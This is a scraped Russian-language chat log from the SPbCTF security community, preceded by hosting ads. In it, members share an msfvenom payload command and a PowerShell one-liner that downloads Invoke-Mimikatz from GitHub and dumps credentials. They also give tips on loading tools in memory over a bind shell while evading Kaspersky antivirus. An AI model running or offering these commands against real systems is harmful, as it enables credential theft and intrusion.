В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

SPbCTF

1875 membersпожаловаться на группу
2020 September 22

KC

Kat3 Chrome in SPbCTF
Думал, что это будет самый быстрый вариант
источник
09:15пожаловаться#1

LB

Lex Bu in SPbCTF
Kat3 Chrome
Он генерит доку с нужной уязвимостью
Т.е. Ты хочешь посмотреть сработала уязвимость или нет, демонстрацией калькулятора?
источник
09:16пожаловаться#2

KC

Kat3 Chrome in SPbCTF
Yep)
источник
09:16пожаловаться#3

LB

Lex Bu in SPbCTF
Haki
можно так msfvenom -p windows/exec CMD='calc.exe' exitfunc=thread -a x86 -f python -b '\x00\x0a\x0d\x01'
Ну вот это годно
источник
09:17пожаловаться#4

g

goaway in SPbCTF
Ребят , подскажите, пожалуйста, какой - нибудь простой способ импорта meter / mimikatz в память при наличии bind шела?
источник
15:08пожаловаться#5

%

%2🦠 in SPbCTF
invoke-mimikatz ?
источник
15:09пожаловаться#6

%

%2🦠 in SPbCTF
запуск метерпретера через текущий шелл?
источник
15:10пожаловаться#7

g

goaway in SPbCTF
%2🦠
запуск метерпретера через текущий шелл?
Да, но про условии Kasper a без записи на жёсткий
источник
15:10пожаловаться#8

DA

Danil Augustovich in SPbCTF
Pryanik
Те новый сезон только для питерских?
Если найдется человек, готовый монтировать сходки, то для всего мира)
источник
15:11пожаловаться#9

g

goaway in SPbCTF
%2🦠
invoke-mimikatz ?
Запуск повершела, а потом там импорт модуля?
источник
15:12пожаловаться#10

DT

Dmitriy T in SPbCTF
Danil Augustovich
Если найдется человек, готовый монтировать сходки, то для всего мира)
рускоговорящего мира
источник
15:12пожаловаться#11

DA

Danil Augustovich in SPbCTF
😡
источник
15:12пожаловаться#12

%

%2🦠 in SPbCTF
goaway
Запуск повершела, а потом там импорт модуля?
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

но с каспером не факт что получится
источник
15:12пожаловаться#13

g

goaway in SPbCTF
Нет доступа по вебу
источник
15:12пожаловаться#14

MF

Mr F in SPbCTF
Dmitriy T
рускоговорящего мира
а остальной мир не считается
источник
15:12пожаловаться#15

%

%2🦠 in SPbCTF
goaway
Нет доступа по вебу
а как ты подключился?
источник
15:13пожаловаться#16

g

goaway in SPbCTF
%2🦠
а как ты подключился?
Через bind
источник
15:13пожаловаться#17

b

b95wx1yFnB4 in SPbCTF
В burp-е я могу перехватывать пакеты которые отправляет мой телефон, а можно ли как то потделать ответ от сервера, поменять полученное значение на что то другое?
источник
15:16пожаловаться#18

%

%2🦠 in SPbCTF
goaway
Через bind
ну я бы тогда передал скриптец на конечную машину, предварительно обфусцировав. и смотреть дальше
источник
15:18пожаловаться#19

DT

Dmitriy T in SPbCTF
b95wx1yFnB4
В burp-е я могу перехватывать пакеты которые отправляет мой телефон, а можно ли как то потделать ответ от сервера, поменять полученное значение на что то другое?
можно
источник
15:18пожаловаться#20